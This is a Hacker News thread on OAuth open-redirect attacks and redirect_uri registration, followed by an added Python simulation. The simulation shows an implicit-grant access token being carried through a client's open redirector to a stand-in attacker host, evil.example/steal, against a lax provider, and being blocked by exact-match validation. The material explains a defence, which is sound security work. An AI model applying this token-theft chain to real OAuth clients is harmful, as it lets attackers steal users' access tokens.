Hacker News
by davewhat 4428 days ago
The flow does not originate at your site. Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

The URL is generated by a malicious party. The URL constructed (1) sends the user to Google / Twitter for authentication, (2) includes a return URL of your open redirector, and (3) has your open redirect send you on to an evil site.

1 comment

> Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

Sorry, I don't understand this sentence.

The redirect URI is not normally passed to Google / FB / Instagram dynamically, but normally registered with Google / FB / Instagram once, when you set up an app with them (and get a secret key, etc.).

If someone else registered their own app with their own redirector, they wouldn't have my secret key.

Edit: removed Twitter, they use OAuth 1 which is strange / different / weird.

No, you do pass the URI dynamically, it's a required part of the Access Token Request: http://tools.ietf.org/html/draft-ietf-oauth-v2-16#section-4....

It's just that with a decent implementation, you should also be required to register it beforehand with the provider.

Not just a decent implementation; an implementation which meets the spec. This is not a problem with OAuth2, which explicitly requires registration of URIs where the implicit grant type is used, and covers other cases well in the Security Considerations section.

That makes a lot of sense: I've only really dealt with OAuth 2, as OAuth 1.0a is vastly more complicated and only Twitter seems to still use it.

Thanks icebraining & vertex-four.
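The three-step chain davewhat describes (attacker builds the authorization URL, points redirect_uri at the client's open redirector, the redirector forwards to the attacker's site) and the fix icebraining and vertex-four point to (the provider must only honour a redirect_uri registered in advance) can both be shown in a few lines. The following is an added example, not code from the thread or from any of the providers named in it. Every host (provider.example, app.example, evil.example), the client id, the redirector's "next" parameter and the token value are made up for illustration. The browser's behaviour of carrying the fragment across a 302 whose Location has no fragment is real (RFC 7231 section 7.1.2) and is what lets an implicit-grant token survive the hop.

```python
"""Open redirector + lax redirect_uri validation => implicit-grant token theft.

Constructed example; no real provider, client or token appears here.
"""
from urllib.parse import urlencode, urlsplit, parse_qs

# What the client app registered with the provider when it was set up.
# Hypothetical values; a conforming provider keeps exactly this list.
REGISTERED_CLIENTS = {
    "client-123": {"redirect_uris": ["https://app.example/oauth/callback"]},
}

TOKEN = {"access_token": "tok-abc", "token_type": "bearer"}  # made-up token


def attacker_builds_link(provider_authz, client_id, open_redirector, evil):
    """Steps (1) and (2): the attacker, not the client, assembles the
    authorization URL. redirect_uri is the client's open redirector, whose
    hypothetical 'next' parameter already names the attacker's destination."""
    redirect_uri = open_redirector + "?" + urlencode({"next": evil})
    return provider_authz + "?" + urlencode({
        "response_type": "token",   # implicit grant: token comes back in the fragment
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": "email",
        "state": "whatever",
    })


def provider_redirect_lax(authz_url):
    """Non-conforming provider: accepts any redirect_uri on the registered
    host. Returns the URL it sends the authenticated browser to."""
    q = parse_qs(urlsplit(authz_url).query)
    client = REGISTERED_CLIENTS[q["client_id"][0]]
    redirect_uri = q["redirect_uri"][0]
    registered_host = urlsplit(client["redirect_uris"][0]).netloc
    if urlsplit(redirect_uri).netloc != registered_host:
        raise ValueError("redirect_uri host mismatch")
    return redirect_uri + "#" + urlencode(TOKEN)


def provider_redirect_strict(authz_url):
    """Conforming provider: redirect_uri must equal a registered value, and an
    unregistered one is an error rather than a redirect."""
    q = parse_qs(urlsplit(authz_url).query)
    client = REGISTERED_CLIENTS[q["client_id"][0]]
    redirect_uri = q["redirect_uri"][0]
    if redirect_uri not in client["redirect_uris"]:
        raise ValueError("redirect_uri not registered for this client")
    return redirect_uri + "#" + urlencode(TOKEN)


def open_redirector(url):
    """Step (3): the client's open redirector, modelled as a 302 whose
    Location is copied straight from 'next'. The server never sees the
    fragment; the browser re-attaches it to the new Location when that
    Location has no fragment of its own, so the token rides along."""
    parts = urlsplit(url)
    next_url = parse_qs(parts.query)["next"][0]
    if parts.fragment and not urlsplit(next_url).fragment:
        next_url = next_url + "#" + parts.fragment
    return next_url


def run_attack(provider):
    """Drive the whole chain against the given provider implementation and
    return the final URL the browser lands on."""
    link = attacker_builds_link("https://provider.example/oauth/authorize",
                                "client-123",
                                "https://app.example/redirect",
                                "https://evil.example/steal")
    return open_redirector(provider(link))


def attack_succeeds(provider):
    """True when the access token ends up on the attacker's origin."""
    try:
        final = urlsplit(run_attack(provider))
    except ValueError:
        return False
    return final.netloc == "evil.example" and "access_token=" in final.fragment


if __name__ == "__main__":
    print("lax provider   :", run_attack(provider_redirect_lax))
    print("strict provider:", "rejected" if not attack_succeeds(provider_redirect_strict)
          else run_attack(provider_redirect_strict))
```

Against the lax provider the browser ends up at https://evil.example/steal with the token in the fragment, even though the provider "checked" the host. The strict provider refuses before any redirect happens, which is why registering the exact redirect_uri (and comparing it exactly, not by host or prefix) matters more than whether the URI is also sent in the request.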